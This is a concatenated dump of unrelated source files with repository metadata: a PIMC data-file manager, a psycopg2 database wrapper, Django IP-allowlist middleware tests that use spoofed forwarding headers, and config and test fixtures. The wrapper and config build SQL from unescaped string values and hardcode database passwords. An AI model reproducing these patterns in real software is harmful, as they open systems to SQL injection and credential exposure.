def DetectDiff(inList, lookFor):
'''Detects which elements of lookFor are not contained in inList'''
absElements = []
for n,pimcid in enumerate(lookFor):
existsflag = False
for elements in inList:
if elements.find(pimcid) != -1:
existsflag = True
break
if existsflag == False:
absElements.append(n)
return absElements
def CopyDataFiles(BaseDir, newfolderName,PIMCs,fileList):
for pimcid in PIMCs:
for fileName in fileList:
if fileName.find(pimcid) != -1:
shutil.copyfile(BaseDir+fileName, newfolderName+fileName)
def MoveDataFiles(BaseDir, newfolderName,PIMCs,fileList):
for pimcid in PIMCs:
for fileName in fileList:
if fileName.find(pimcid) != -1:
shutil.move(BaseDir+fileName, newfolderName+fileName)
def DeleteDataFiles(BaseDir,PIMCs,fileList):
for pimcid in PIMCs:
for fileName in fileList:
if fileName.find(pimcid) != -1:
os.remove(BaseDir+fileName)
def main():
parser = OptionParser()
parser.add_option("-r", "--run", help="run number")
parser.add_option("-m", action="store_true", dest="move", default=False,\
help="Check to move pimc data files to the 'run-${run}' folder")
parser.add_option("-d", action="store_true", dest="delete", default=False,\
help="Check to delete pimc data files")
parser.add_option("-c", action="store_true", dest="copy", default=False,\
help="Check to copy pimc data files to the 'run-${run}' folder")
parser.add_option("-a", action="store_true", dest="archive", default=False,\
help="Check to archive pimc data files to the archive folder")
parser.add_option("--out", dest = 'outDir',\
help="Folder containing pimc redirected output files. Default = ''", default = './')
parser.add_option("--OUTPUT", dest = 'OUTPUTDir',\
help="Folder containing pimc data files. Default = '../OUTPUT/'", default = '../OUTPUT/')
(options, args) = parser.parse_args()
options.outDir = options.outDir.rstrip('/')+'/'
options.OUTPUTDir = options.OUTPUTDir.rstrip('/')+'/'
if options.run == None:
parser.error("Must specify flag -r to determine relevant output files to proceed")
if options.delete and options.copy:
parser.error("Cant delete and copy at the same time")
if options.move and options.copy:
parser.error("Cand move and copy at the same time")
#---------------------------------------------------------------------------------------------#
#---------------Get unique pimcids from the redirected output files---------------------------#
#---------------------------------------------------------------------------------------------#
fileList = os.listdir(options.outDir)
PIMCs = []
outputFiles = []
for files in fileList:
if files.find(options.run) != -1:
outputFiles.append(files)
temp = GetPIMCs(options.outDir+files)
if temp == 0:
print '%s contains no measurements' %options.outDir+files
else:
PIMCs.extend(temp)
print PIMCs
if len(outputFiles) == 0:
print 'No redirected output files for the run %s detected' %options.run
sys.exit()
if len(PIMCs) == 0:
print 'No measurements for the run %s detected' %options.run
sys.exit()
#Store unique pimcids
PIMCs = GetUnique(PIMCs)
#Keep an extra copy for the Cylinder folder
cPIMCs = PIMCs[:]
#---------------------------------------------------------------------------------------------#
#-----------------------------------------Normal output---------------------------------------#
#---------------------------------------------------------------------------------------------#
fileList = os.listdir(options.OUTPUTDir)
delpimcid = DetectDiff(fileList, PIMCs)
for n in reversed(delpimcid):
print('%s doesnt longer exist') %PIMCs[n]
PIMCs.pop(n)
if len(PIMCs) == 0:
print 'None of the files cant be found'
sys.exit()
#-------------------------- archive data-files-----------------------
if (options.archive):
#Create an archive folder
if not(os.path.exists(options.OUTPUTDir+'archive/')):
os.makedirs(options.OUTPUTDir+'archive/')
for pimcid in PIMCs:
for fileName in fileList:
if fileName.find(pimcid) != -1:
shutil.copyfile(options.OUTPUTDir+fileName, options.OUTPUTDir+'archive/'+fileName)
#----------------------------------------------------------------------
#Create an output folder
if options.copy or options.move:
folderName = options.OUTPUTDir+'run-'+options.run+'/'
if os.path.exists(folderName):
print("Folder %s already exists" %(folderName))
sys.exit()
else:
os.makedirs(folderName)
for outFile in outputFiles:
shutil.copyfile(options.outDir+outFile,folderName+outFile)
#-------------------------- Copy data-files----------------------------
if (options.copy):
CopyDataFiles(options.OUTPUTDir,folderName,PIMCs,fileList)
#-------------------------- Move data-files----------------------------
if (options.move):
MoveDataFiles(options.OUTPUTDir,folderName,PIMCs,fileList)
#-------------------------- Delete data-files--------------------------
if (options.delete):
DeleteDataFiles(options.OUTPUTDir,PIMCs,fileList)
#---------------------------------------------------------------------------------------------#
#--------------------------------------Cylindrical output-------------------------------------#
#---------------------------------------------------------------------------------------------#
if os.path.exists(options.OUTPUTDir+'CYLINDER'):
cfileList = os.listdir(options.OUTPUTDir+'CYLINDER')
else:
print 'No cylindrical ouput'
sys.exit()
for n,fileName in enumerate(cfileList):
cfileList[n] = 'CYLINDER/' + fileName
#-------------------------- archive data-files-----------------------
if (options.archive):
#Create an archive folder
if not(os.path.exists(options.OUTPUTDir+'archive/CYLINDER')):
os.makedirs(options.OUTPUTDir+'archive/CYLINDER')
for pimcid in PIMCs:
for fileName in cfileList:
if fileName.find(pimcid) != -1:
shutil.copyfile(options.OUTPUTDir+fileName, options.OUTPUTDir+'archive/'+fileName)
if options.copy or options.move:
os.makedirs(folderName+'CYLINDER/')
#-------------------------- Copy data-files----------------------------
if (options.copy):
CopyDataFiles(options.OUTPUTDir,folderName,PIMCs,cfileList)
#-------------------------- Move data-files----------------------------
if (options.move):
MoveDataFiles(options.OUTPUTDir, folderName,PIMCs,cfileList)
#-------------------------- Delete data-files--------------------------
if (options.delete):
DeleteDataFiles(options.OUTPUTDir, PIMCs,cfileList)
if __name__ == "__main__":
main()
| [
"bohdan.kul@gmail.com"
] | bohdan.kul@gmail.com |
ca7d63f3b658a434c6153999f2adede751fedc6d | e3b8d982a3c1060e86f3dc82ca07b258cfa19b46 | /connection/conn.py | 040f3af10d81cb78e1a8839ed2f1e55ca5ffcacf | [] | no_license | paul30041981/BIBLIOTECA | b79316ef4eef869d7eeb8214cc580bd35c2ec7f9 | 8b4fc117ce51d3ebf0c6f56c7e4a9a83576faccd | refs/heads/main | 2023-02-28T20:54:36.880403 | 2021-02-01T17:23:21 | 2021-02-01T17:23:21 | 335,025,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,155 | py | from psycopg2 import connect
class Connection:
def __init__(self, table_name):
self.table_name = table_name
self.db = connect(host='127.0.0.1',
user='postgres',
password='admin',
database='biblioteca')
self.cursor = self.db.cursor()
def execute_query(self, query): # Se usa para ejecutar INSERT, UPDATE, DELETE (DDL)
self.cursor.execute(query)
self.commit()
def get_all(self, order):
query = f'SELECT * FROM {self.table_name} ORDER BY {order}'
self.cursor.execute(query)
return self.cursor.fetchall()
def get_by_id(self, id_object):
list_where = []
for field_name, field_value in id_object.items():
value = field_value
if isinstance(field_value, str):
value = f"'{field_value}'"
list_where.append(f"{field_name}={value}")
query = f'''
SELECT * FROM {self.table_name} WHERE {" AND ".join(list_where)}
'''
self.cursor.execute(query)
return self.cursor.fetchone()
def get_columns(self, id_object):
list_where = []
for field_name, field_value in id_object.items():
value = field_value
if isinstance(field_value, str):
value = f"'{field_value}'"
list_where.append(f"{field_name}={value}")
query = f'''
SELECT * FROM {self.table_name} WHERE {" AND ".join(list_where)}
'''
self.cursor.execute(query)
return self.cursor.fetchall()
def insert(self, data):
values = "'" + "', '".join(map(str, data.values())) + "'"
query = f'INSERT INTO {self.table_name} ({", ".join(data.keys())}) VALUES ({values})'
self.execute_query(query)
return True
def update(self, id_object, data):
list_update = []
for field_name, field_value in data.items():
value = field_value
if isinstance(field_value, str):
value = f"'{field_value}'"
list_update.append(f"{field_name}={value}")
list_where = []
for field_name, field_value in id_object.items():
value = field_value
if isinstance(field_value, str):
value = f"'{field_value}'"
list_where.append(f"{field_name}={value}")
query = f'''
UPDATE {self.table_name} SET {", ".join(list_update)}
WHERE
{" AND ".join(list_where)}
'''
self.execute_query(query)
return True
def delete(self, id_object):
list_where = []
for field_name, field_value in id_object.items():
value = field_value
if isinstance(field_value, str):
value = f"'{field_value}'"
list_where.append(f"{field_name}={value}")
query = f'''
DELETE FROM {self.table_name}
WHERE
{" AND ".join(list_where)}
'''
self.execute_query(query)
return True
def commit(self):
self.db.commit()
return True
| [
"paul.cruces@celeritech.biz"
] | paul.cruces@celeritech.biz |
3b46437bab2201c5b68d21fe24459ba22d1c1b65 | 70cc4af81e3085de43faa47aff8722562d2645c7 | /failure.py | 687aaff345e489c7f40ca74633f1c7673ec840dd | [] | no_license | jl24350/food-log | 4b57201c1d2c83eaee8163e074880fb449f2c9b3 | e7c2f1789b709f33b20da8acbc99c5288b2e2680 | refs/heads/main | 2023-03-22T07:25:47.676032 | 2021-03-12T23:24:34 | 2021-03-12T23:24:34 | 347,223,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | import tkinter as tk
import time
import subprocess
def main_menu():
window.destroy()
subprocess.call("main.py", shell=True)
window = tk.Tk()
window.rowconfigure(0, minsize=250, weight=1)
window.columnconfigure([0, 1, 2], minsize=250, weight=1)
title = tk.Label(master=window, text= "Something Went Wrong! Try Again",font=('Arial',30))
title.grid(row=0, column = 1)
btn_enter =tk.Button(master=window, text="Return to Main Menu", command=main_menu, width = 25,font=('Arial',12))
btn_enter.grid(row=2,column=1,pady=10)
window.mainloop()
| [
"noreply@github.com"
] | jl24350.noreply@github.com |
1908f8673019ee60a62183f9409a6ca86cd08649 | 358519772669c73092f625f630722c38e1d33783 | /ctools/Testing/Types/ImproperDihedral2Type.py | 3855f86040c5114b8995f4d188699f85bb2a3205 | [] | no_license | minghao2016/mmtools | e7e61aca084498408ceae965dd6c9450ad89eafa | 3ade988afb51cd54ee5a4067d8deaad88afbb0fe | refs/heads/master | 2021-09-21T01:02:22.522187 | 2014-09-19T03:40:03 | 2014-09-19T03:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | import sys
sys.path.append('..')
from Decorators import *
from Types.AbstractDihedralType import *
class ImproperDihedral2Type(AbstractDihedralType):
@accepts_compatible_units(None,
None,
None,
None,
None,
units.degrees,
units.kilojoules_per_mole * units.radians**(-2))
def __init__(self, atom1, atom2, atom3, atom4, type, xi, k):
"""
"""
AbstractDihedralType.__init__(self, atom1, atom2, atom3, atom4, type)
self.xi = xi
self.k = k
| [
"choderaj@mskcc.org"
] | choderaj@mskcc.org |
56e9f9a74c861671e55dd10179ddabf593b5357f | d3bcffd405b98c8281fca1fcd49e48cbda3480ec | /python-interm-class files/EXAMPLES/use_samplelib1.py | 5f30c34c287a032469ad824bef8ee16c0234132b | [] | no_license | tbro28/intermediatepython | cfef5232f1a3db37f37f3bdd5c49232d8d815839 | 5c665c10ff6aac00e8e6620b165fc97c7e2da525 | refs/heads/main | 2023-01-06T19:25:09.778419 | 2020-11-11T21:56:54 | 2020-11-11T21:56:54 | 312,094,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py | #!/usr/bin/env python
import samplelib # <1>
samplelib.spam() # <2>
samplelib.ham()
| [
"brownti28@yahoo.com"
] | brownti28@yahoo.com |
fde4b6b5dc43b86ba4ef792ff3fedc412c970a03 | 4d5c707b45fe7f8f9baa80a291fe9d9c2ee357c1 | /dataqs/airnow/tasks.py | 9a75315181b1e007a03bc6532020c5869eef6375 | [
"Apache-2.0"
] | permissive | dorukozturk/dataqs | 96772c2e5a262b4753dcf03e043d81b9c5491eb4 | 9b938f3c2f2b15b75c149f8dd06083f2d888f77d | refs/heads/master | 2021-01-12T01:56:51.017629 | 2017-01-10T18:32:02 | 2017-01-10T18:32:02 | 54,613,378 | 1 | 0 | null | 2016-03-24T03:58:38 | 2016-03-24T03:58:38 | null | UTF-8 | Python | false | false | 1,050 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc. and Epidemico Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
from __future__ import absolute_import
from celery import shared_task
from dataqs.airnow.airnow import AirNowGRIB2HourlyProcessor
@shared_task
def airnow_grib_hourly_task():
processor = AirNowGRIB2HourlyProcessor()
processor.run()
| [
"matt@epidemico.com"
] | matt@epidemico.com |
76685f23ac80025d9fc64fa03036df7c4bbdbbbe | 485816a0a8b86818e4f2cefec517e6316e2252d6 | /posthog/test/test_middleware.py | e7bd0e8275c8ba6c3d46790e80193e5a60a215f4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | abhijitghate/posthog | 3647443274aee6431e7fecf6902644a9fa7eb9d8 | 68dc4d2730600efb00d3708fb7fba70d85612760 | refs/heads/master | 2023-04-19T15:17:25.033992 | 2021-05-13T09:48:59 | 2021-05-13T09:48:59 | 279,130,099 | 1 | 0 | MIT | 2020-07-12T19:04:15 | 2020-07-12T19:04:14 | null | UTF-8 | Python | false | false | 6,775 | py | from django.conf import settings
from rest_framework import status
from posthog.test.base import APIBaseTest
class TestAccessMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_ip_range(self):
"""
Also test that capture endpoint is not restrictied by ALLOWED_IP_BLOCKS
"""
with self.settings(ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25", "128.0.0.1"]):
# not in list
response = self.client.get("/", REMOTE_ADDR="10.0.0.1")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="10.0.0.1",)
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST
) # Check for a bad request exception because it means the middleware didn't block the request
# /31 block
response = self.client.get("/", REMOTE_ADDR="192.168.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.1")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# /24 block
response = self.client.get("/", REMOTE_ADDR="127.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.100")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.200")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
# precise ip
response = self.client.get("/", REMOTE_ADDR="128.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="128.0.0.2")
self.assertIn(b"IP is not allowed", response.content)
def test_trusted_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
def test_attempt_spoofing(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.2",)
self.assertIn(b"IP is not allowed", response.content)
def test_trust_all_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUST_ALL_PROXIES=True):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
class TestToolbarCookieMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_logged_out_client(self):
response = self.client.get("/")
self.assertEqual(0, len(response.cookies))
def test_logged_in_client(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=False):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, settings.TOOLBAR_COOKIE_NAME)
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], "")
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logged_in_client_secure(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=True):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, "phtoolbar")
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], True)
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logout(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar"):
self.client.force_login(self.user)
response = self.client.get("/")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "yes")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 31536000)
response = self.client.get("/logout")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 0)
| [
"noreply@github.com"
] | abhijitghate.noreply@github.com |
5da2bb73cee504a5ec4a593142d03a0d73ca261a | 666ec5948ab7f0b8c5df507e5ca702f2f126deac | /venv/bin/pip3 | ae3763ac677e8a4866fc454774c2b42f41e26ecd | [] | no_license | mforner13/microblog | 56ab51f515ed80fa271ba3a6d15fc632cba7f512 | e1de13c5d6bf2b07e00ec5149d37a89677ea3a7e | refs/heads/master | 2020-06-01T04:18:52.399698 | 2019-08-08T21:24:47 | 2019-08-08T21:24:47 | 190,631,063 | 1 | 2 | null | 2019-06-06T21:08:59 | 2019-06-06T18:33:26 | Python | UTF-8 | Python | false | false | 255 | #!/Users/miriamforner/Documents/microblog/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"miriamforner@Mo-Macbook-Pro-with-the-touchbar-and-bluetooth-mouse.local"
] | miriamforner@Mo-Macbook-Pro-with-the-touchbar-and-bluetooth-mouse.local | |
a8c4d405d671905f725216d0b46f0e6706a0ca3b | cb0b486eafb14d99861120fef9231c421238680e | /config/settings.py | ca234b4f31c74c3255e4150532d69635dde93ff9 | [] | no_license | webclinic017/apitest | f617b9d7c3564e4f99230b67716536399f3e0074 | 9b7f939f2d990dcccad69423ba0f9f0762409f56 | refs/heads/master | 2023-05-08T20:45:52.403365 | 2020-07-09T05:52:44 | 2020-07-09T05:52:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,388 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 获取项目路径
import os
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#print(BASE_PATH)
# 定义测试执行用例的路径
TESTCASE_PATH = os.path.join(BASE_PATH,'test_case')
#定义测试数据的路径
TESTCASE_EXCLE_PATH = os.path.join(BASE_PATH,'config','test.xlsx')
print(TESTCASE_EXCLE_PATH)
#print(TESTCASE_PATH)
# 定义测报告的路径
REPORT_PATH = os.path.join(BASE_PATH,'report')
#print(REPORT_PATH)
# 定义日志文件的路径
LOG_PATH = os.path.join(BASE_PATH,'log/log.txt')
# 连接MysSQL
USER_NAME = 'parcels_test'
USER_PASSWORD = '123456'
DB_IP = '192.168.8.168'
DB_NAME = 'parcels_17feia_merge3'
port = 3306
import pymysql
from common.logger import Logger
logger = Logger().logger
def assertEquals(actual, expected):
'''
断言是否相等
:param actual: 实际值
:param expected: 期望值
:return:
'''
try:
assert actual == expected
logger.info('断言成功,实际值:{} 等于预期值:{}'.format(actual, expected))
except AssertionError as e:
logger.info('断言失败,实际值:{} 不等于预期值:{}'.format(actual, expected))
raise e
def opera_db(order_on):
expect = 1
db = pymysql.connect(host=DB_IP, port=3306, user=USER_NAME, passwd=USER_PASSWORD, db=DB_NAME, charset='utf8')
try:
with db.cursor() as cursor:
sql = "SELECT i.orde_order_inside_no,i.is_payed,o.finace_order_no,o.is_payed,p.finance_order_package_no,p.is_payed FROM fina_finance_order_item i LEFT JOIN fina_finance_order o ON i.finance_order_id = o.id LEFT JOIN fina_finance_order_package p ON p.id = o.finance_order_package_id WHERE i.orde_order_inside_no = '{}'".format(order_on)
cursor.execute(sql)
results = cursor.fetchall()
print(results)
for result in results:
print(result)
resultStaus =[]
resultStaus.append(int(result[1][0]))
resultStaus.append(int(result[3][0]))
resultStaus.append(int(result[5][0]))
print(resultStaus)
assertEquals(resultStaus[0],expect)
except AssertionError as e:
print("no search data:{}".format(e))
finally:
db.close()
if __name__ == "__main__":
opera_db("FEISZ1720315782YQ")
| [
"1161313037@qq.com"
] | 1161313037@qq.com |
8d4456f1709a03ff7ff76e4b6638771ded6bae27 | 4c6113392ea456e1eb964172b43f0c9846ca712a | /tests/test_standard_deviation.py | 6b866dc49e5a5dc366f0596b18e6b8812eb37b4d | [
"MIT"
] | permissive | g8a9/pyti | abd344d4d5eb30f36e6c860eb82567d7cacbd780 | 1697ea000730a2238df70505ba77e165619fdf8c | refs/heads/master | 2020-03-27T11:04:22.417031 | 2019-09-09T08:50:51 | 2019-09-09T08:50:51 | 146,463,237 | 0 | 1 | MIT | 2018-08-28T14:53:08 | 2018-08-28T14:53:07 | null | UTF-8 | Python | false | false | 9,669 | py | from __future__ import absolute_import
import unittest
import numpy as np
from tests.sample_data import SampleData
from pyti import standard_deviation
class TestStandardDeviation(unittest.TestCase):
def setUp(self):
"""Create data to use for testing."""
self.data = SampleData().get_sample_close_data()
self.std_period_6_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
6.5577905323871235, 3.523047922845588, 3.64000366300183,
2.6142411263437193, 2.6233540871691017, 2.5428206123646837,
2.8984064587286413, 2.8167262321117761, 3.8064874447010402,
4.1082230546389029, 8.3307254586060449, 10.698429168184775,
14.471698472075328, 14.149189022696682, 16.029104466563318,
13.032673938988863, 10.08650583700817, 9.4405432400189078,
10.488392949669004, 10.589531938035151, 8.7339880161737451,
5.0316216736422801, 3.8436670858265902, 3.9887023788027181,
4.0649809347646144, 4.083843369507024, 4.8440000688136395,
11.967095581914025, 11.182192390880525, 11.491860887892189,
16.916712151006177, 22.056151447309816, 22.859576257373337,
16.434078820142823, 14.253613810773276, 13.039983767883554,
13.022551209344496, 12.50387726533919, 16.058846471649176,
15.333279710051146, 12.463120663247507, 8.355378307812666,
9.0049564129983466, 6.6962407364132304, 6.4353546910795751,
5.2716958055891929, 5.3789689222625849, 9.4365405031010461,
9.4650967594983619, 10.229352700277104, 9.58579104716976,
6.4664696705389293, 4.0370422341114756, 5.161696103672357,
5.3648150014701983, 5.8074081998770941, 5.3992755686912774,
5.2324474834121784, 1.4768265526684596, 1.3318358257182561,
3.448881944437431, 4.2672145481566792, 4.2827919242786781,
5.130538633191148, 5.783125164361131, 5.2763611198123055,
6.6918926072275768, 8.2688781988046696, 8.8089197218879818,
7.3125547291399391, 5.0221549159698196, 5.0711711336402896,
4.9256529178035535, 5.6864083567749528, 6.5936466895540216,
8.2274234524951151, 8.8677071444652373, 7.4646598493612917,
8.3602240799315091, 8.0184206674381961, 8.3401744586069686,
6.6355034976003617, 2.6993406602353964, 2.0581391271405236,
2.0719885778321165, 2.0978504872051325, 2.2254437759692176,
3.049114078985355, 4.1007641564306905, 4.3524338019089699,
3.4153872401237066, 3.4531299811426996, 2.9287608301122723,
2.648205052483652, 2.6683584217017398, 2.7031296676260124,
1.2711792425408255, 1.158740695755534, 4.2491112796285666,
4.7691131250998939, 4.4221567136409838, 3.7499159990591719,
5.0847300813317311, 13.454516589854368, 17.889961896736011,
19.98118781921303, 18.782584131760668, 12.993947821966982,
3.989429783816254, 2.5093963417523479, 2.2056057369046482,
2.4943830232477606, 8.4362062958812629, 9.8113133677403432,
11.767257964368774, 10.560069602043356, 9.2450563365869662,
6.762383209096229, 10.628135772561432, 10.820357973129482,
11.395558345250143, 8.3253558482505863]
self.std_period_8_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan, 7.0210000050867709, 4.1373628591859681,
3.2119864792457009, 2.7914512354687684, 3.4517159293810558,
2.9480489916456389, 3.3239821213203209, 3.5875118217824093,
7.0898191594910145, 9.6610417029280189, 14.687200878413067,
16.195911080093211, 18.167517274756381, 17.864408150605726,
15.684568394262103, 11.769444625202757, 10.355555358633076,
8.9695687903998031, 8.9965326654217108, 9.4195188685136966,
7.8538143599145407, 4.9657714118035772, 4.4569047555450325,
3.8001832662573869, 4.1709606207683017, 10.62482193128093,
10.778041168439238, 10.368574688520509, 14.639153956818289,
18.713909981233599, 19.898422047991648, 19.861963649146077,
19.509732690194838, 14.34043079398743, 12.959500651755734,
12.497358506614786, 14.475216998126715, 15.211531281517024,
17.001755161495186, 16.432812069149929, 14.674135408943185,
9.7164201961715975, 7.6440704143800264, 5.8451933855335998,
5.64821447766586, 8.2422530726910797, 10.625605192848331,
11.692462086440853, 9.3994635105262265, 8.8257479448324467,
8.2020719290049708, 6.6277963101298756, 4.6265561088752829,
5.0357789509525652, 5.1546871874052478, 5.4984069121363168,
4.875291749511721, 4.4419035494770691, 3.0770089256567457,
3.888717884562241, 3.9120171997869004, 5.1726366238947525,
6.0172975365073498, 5.404976542832701, 6.0530629790686739,
7.3309684363176757, 7.7985836626183254, 7.575020980640458,
9.0041798825402761, 8.6284213710934914, 5.4515083102883279,
5.1782069083529505, 5.6630795193831744, 7.1805271145548293,
8.1723628337044669, 8.0955966867356697, 7.9802591257606208,
7.8027393312495414, 8.0798487211793066, 7.3342765491901138,
7.2319093260355505, 5.8455966333642975, 2.3867655938529189,
2.3230690906643527, 2.6017847583094862, 2.8489970039597292,
3.6898432022435403, 4.8986382947567213, 4.7263741388087315,
4.3969662837006034, 4.042064536135654, 3.9273398394187429,
3.2888054170821017, 2.6214268197736392, 2.3381906924555294,
2.3338621424582748, 3.6274033904630554, 4.3679741544892181,
4.5729569989543766, 4.3530613201680106, 5.4448558619253422,
13.02311290140943, 16.948090442373044, 18.927592811629722,
20.199922736768791, 19.547403736996472, 17.506905933292263,
11.913134333283477, 4.0137655992489707, 3.0322316157293447,
7.5580302611574259, 9.5411865651725272, 11.636474598065714,
11.543465684100253, 12.016773321962457, 12.317852244956159,
13.544956625991842, 11.53342773667667, 12.324006697151235,
11.031367937451309]
self.std_period_10_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan, np.nan, np.nan, 6.4860058759009869, 4.1526223307955945,
3.9927105802672158, 3.3004546824810688, 3.5370766334801407,
3.3311401118002317, 6.4384024933726254, 8.9119850014834938,
13.351934067142995, 15.482619969214232, 19.070120928358637,
20.404015100519359, 18.748148353015203, 16.133700409047169,
14.06749796121858, 10.572570590395159, 9.1555945859470089,
8.3281877447083907, 8.5784715033234864, 8.6222052476923263,
7.3341742699653665, 4.63688305270301, 4.7504993889531688,
9.7508812137387935, 9.598666805574835, 9.6019130616999515,
13.188306942136279, 16.671782548166032, 17.789894790770031,
17.598722302106669, 17.607555480531644, 17.578184743849089,
18.26081734205783, 14.630932263150182, 14.408303315950986,
13.91782390398089, 15.258254924247829, 17.018062822255114,
19.390673273509599, 17.141471640439732, 13.282047574744562,
8.829194250389504, 6.9174080727136875, 7.5843822717769385,
9.459425928082986, 10.848561399763753, 11.075405435267605,
10.800855984596765, 8.4768862207770468, 8.7709599753327296,
8.5115699035032346, 6.5623254685786003, 4.577379648275234,
4.8737227386601729, 4.8845566158386609, 4.9416124224116613,
4.7068613038131062, 4.847774403441905, 3.641202640154293,
4.865707211358564, 5.8317850326179617, 5.5646648097117852,
5.8853513064217546, 6.6371132446435244, 7.1101839326107275,
7.1871184922903826, 8.3465498527502113, 9.073611555861687,
9.0870854024330132, 8.3398348638060895, 5.9142930450073328,
6.4203717441697474, 7.2659339080090346, 7.2219849533674978,
7.5313847774938836, 7.758637122587956, 7.6485459039247745,
7.1610294883720007, 7.2388940990856998, 6.9341618895949626,
6.6686421239842977, 5.2047658715621195, 2.6397003196912121,
3.1091942507487307, 3.9894729532163118, 4.6656708461318193,
4.5243402220041311, 5.1604522842264302, 5.3878571291789461,
4.974325638270523, 4.4714657055103819, 3.9744830551350327,
3.0170508042715429, 2.3489572154468794, 3.5151007572092858,
4.0541939875749557, 4.1687462810245028, 4.2825289776537945,
5.7083739657921253, 12.580634324230228, 16.397131049871689,
